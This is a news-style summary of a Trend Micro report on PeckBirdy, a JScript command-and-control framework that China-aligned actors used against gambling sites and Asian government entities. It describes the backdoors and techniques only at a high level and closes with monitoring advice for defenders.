China-Backed ‘PeckBirdy’ Takes Flight for Cross-Platform Attacks
Summary
Trend Micro has been tracking a cross-platform JScript command-and-control framework called PeckBirdy since 2023. China-aligned actors used the framework in at least two distinct campaigns — Shadow-Void-044 (targeting Chinese gambling sites) and Shadow-Earth-045 (targeting Asian government entities) — to deliver modular backdoors and perform cyber-espionage.
PeckBirdy is written in Microsoft JScript and is designed to execute across multiple environments by abusing living-off-the-land binaries (LOLBins). Its runtime, dynamically generated code and lack of persistent file artefacts make detection difficult for traditional endpoint defences. Researchers observed new modular backdoors (MKDoor and HoloDonut), plus prior tools such as GrayRabbit, and ancillary techniques including stolen code-signing certificates, Cobalt Strike, a Chrome RCE (CVE-2020-16040), website injections, MSHTA execution and .NET launchers to enable credential harvesting, lateral movement and persistence.
Key Points
- PeckBirdy is a JScript-based, cross-platform C2 framework tracked by Trend Micro since 2023.
- Two separate campaigns (Shadow-Void-044 and Shadow-Earth-045) used PeckBirdy to target gambling sites and government organisations respectively.
- Attackers used website injections and fake Chrome update pages to trick victims into running backdoors such as MKDoor and HoloDonut.
- PeckBirdy leverages LOLBins/LOTL techniques and runtime-injected JavaScript, leaving few persistent artefacts and complicating detection.
- Observed tooling included stolen code-signing certificates, Cobalt Strike, GrayRabbit, a Chrome RCE (CVE-2020-16040) and .NET/MSHTA-based execution paths.
- Some infrastructure overlaps point to possible links with known China-aligned groups (Earth Baxia, UNC3569) but attribution remains uncertain.
- Trend Micro provides hunting queries and IOCs; continuous monitoring of web-facing infrastructure is advised.
Context and Relevance
This is significant for defenders of web portals, government systems and organisations that host user logins or serve dynamic content. PeckBirdy demonstrates a growing trend: attackers reuse lightweight scripting frameworks and LOLBins to operate across platforms while avoiding file-based signatures. The technique widens the attacker playbook beyond platform-specific malware, increasing the risk to organisations that rely on browser-based interactions and third-party web content.
For security teams, the practical takeaways are to prioritise monitoring for runtime script injection, suspicious MSHTA/.NET launches, anomalous network connections to known C2 domains, and signs of credential harvesting on login pages. Incorporate Trend Micro’s provided IOCs and hunting queries into detection workflows where possible.
Why should I read this?
Quick and dirty: if you look after websites, government portals or user logins, this one matters. PeckBirdy is lightweight, sneaky and works across environments — so it can slip past usual defences. Reading this saves you time by flagging what to hunt for (injected scripts, MSHTA launches, odd C2 traffic) before someone else finds the hole.
Author style
Punchy — this is an important technical alert for defenders. The write-up cuts to the chase: a cross-platform JScript C2 plus new modular backdoors equals elevated risk. If you manage detection or incident response, treat the indicators and monitoring advice as high priority.